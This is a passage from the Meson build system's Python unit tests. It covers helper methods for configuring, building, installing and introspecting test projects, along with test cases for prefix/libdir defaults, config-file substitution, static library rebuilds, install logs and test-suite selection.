self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
self.linuxlike_test_dir = os.path.join(src_root, 'test cases/linuxlike')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None,
workdir=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_native_file:
args += ['--native-file', self.meson_native_file]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars, workdir=workdir)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertReconfiguredBuildIsNoop(self):
'Assert that we reconfigured and then there was nothing to do'
ret = self.build()
self.assertIn('The Meson build system', ret)
if self.backend is Backend.ninja:
for line in ret.split('\n'):
if line in self.no_rebuild_stdout:
break
else:
raise AssertionError('build was reconfigured, but was not no-op')
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
# XXX: Note CustomBuild did indeed rebuild, because of the regen checker!
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target of each type said that no rebuild was done
# We always have at least one CustomBuild target for the regen checker
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
self.assertNotRegex(ret, re.compile('CustomBuild:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE))
self.assertNotRegex(ret, re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE))
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
@staticmethod
def get_target_from_filename(filename):
base = os.path.splitext(filename)[0]
if base.startswith(('lib', 'cyg')):
return base[3:]
return base
def assertBuildRelinkedOnlyTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
linked_targets = []
for line in ret.split('\n'):
if 'Linking target' in line:
fname = line.rsplit('target ')[-1]
linked_targets.append(self.get_target_from_filename(fname))
self.assertEqual(linked_targets, [target])
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile(r'Link:\n [^\n]*link.exe[^\n]*/OUT:".\\([^"]*)"', flags=re.IGNORECASE)
matches = linkre.findall(ret)
self.assertEqual(len(matches), 1, msg=matches)
self.assertEqual(self.get_target_from_filename(matches[0]), target)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_do_conf_file_by_format(self):
def conf_str(in_data, confdata, vformat):
(result, missing_variables, confdata_useless) = mesonbuild.mesonlib.do_conf_str(in_data, confdata, variable_format = vformat)
return '\n'.join(result)
def check_formats (confdata, result):
self.assertEqual(conf_str(['#mesondefine VAR'], confdata, 'meson'),result)
self.assertEqual(conf_str(['#cmakedefine VAR ${VAR}'], confdata, 'cmake'),result)
self.assertEqual(conf_str(['#cmakedefine VAR @VAR@'], confdata, 'cmake@'),result)
confdata = ConfigurationData()
# Key error as they do not exists
check_formats(confdata, '/* #undef VAR */\n')
# Check boolean
confdata.values = {'VAR': (False,'description')}
check_formats(confdata, '#undef VAR\n')
confdata.values = {'VAR': (True,'description')}
check_formats(confdata, '#define VAR\n')
# Check string
confdata.values = {'VAR': ('value','description')}
check_formats(confdata, '#define VAR value\n')
# Check integer
confdata.values = {'VAR': (10,'description')}
check_formats(confdata, '#define VAR 10\n')
# Check multiple string with cmake formats
confdata.values = {'VAR': ('value','description')}
self.assertEqual(conf_str(['#cmakedefine VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'),'#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx @VAR@ yyy @VAR@'], confdata, 'cmake@'),'#define VAR xxx value yyy value')
self.assertEqual(conf_str(['#cmakedefine VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'),'#define VAR xxx value yyy value\n')
self.assertEqual(conf_str(['#define VAR xxx ${VAR} yyy ${VAR}'], confdata, 'cmake'),'#define VAR xxx value yyy value')
# Handles meson format exceptions
# Unknown format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR xxx'], confdata, 'unknown_format')
# More than 2 params in mesondefine
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR xxx'], confdata, 'meson')
# Mismatched line with format
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#cmakedefine VAR'], confdata, 'meson')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR'], confdata, 'cmake')
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR'], confdata, 'cmake@')
# Dict value in confdata
confdata.values = {'VAR': (['value'],'description')}
self.assertRaises(mesonbuild.mesonlib.MesonException, conf_str,['#mesondefine VAR'], confdata, 'meson')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
# on Windows, /someabs is *not* an absolute path
prefix = 'x:/someabs' if is_windows() else '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
if is_windows():
args = ['--prefix', 'x:/opt', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
if is_windows():
args = ['--prefix', 'x:/usr', '--libdir', 'x:/opt/lib32']
else:
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
if is_windows():
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=x:/opt', False)
else:
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
if mesonbuild.mesonlib.default_prefix() == '/usr/local':
expected[None] = expected['/usr/local']
for prefix in expected:
args = []
if prefix:
args += ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
mydefault_log = f.read()
# Run tests with another setup
self._run(self.mtest_command + ['--setup=other'])
with open(os.path.join(self.logdir, 'testlog-other.txt')) as f:
other_log = f.read()
self.assertTrue('ENV_A is 1' in default_log)
self.assertTrue('ENV_B is 2' in default_log)
self.assertTrue('ENV_C is 2' in default_log)
self.assertTrue('ENV_A is 1' in mydefault_log)
self.assertTrue('ENV_B is 2' in mydefault_log)
self.assertTrue('ENV_C is 2' in mydefault_log)
self.assertTrue('ENV_A is 1' in other_log)
self.assertTrue('ENV_B is 3' in other_log)
self.assertTrue('ENV_C is 2' in other_log)
def assertFailedTestCount(self, failure_count, command):
try:
self._run(command)
self.assertEqual(0, failure_count, 'Expected %d tests to fail.' % failure_count)
except subprocess.CalledProcessError as e:
self.assertEqual(e.returncode, failure_count)
def test_suite_selection(self):
testdir = os.path.join(self.unit_test_dir, '4 suite selection')
self.init(testdir)
self.build()
self.assertFailedTestCount(4, self.mtest_command)
self.assertFailedTestCount(0, self.mtest_command + ['--suite', ':success'])
self.assertFailedTestCount(3, self.mtest_command + ['--suite', ':fail'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', ':success'])
self.assertFailedTestCount(1, self.mtest_command + ['--no-suite', ':fail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'subprjsucc'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjfail'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'subprjmix'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'mainprj'])
self.assertFailedTestCount(4, self.mtest_command + ['--no-suite', 'subprjsucc'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjfail'])
self.assertFailedTestCount(3, self.mtest_command + ['--no-suite', 'subprjmix'])
self.assertFailedTestCount(1, self.mtest_command + ['--suite', 'mainprj:fail'])
self.assertFailedTestCount(0, self.mtest_command + ['--suite', 'mainprj:success'])
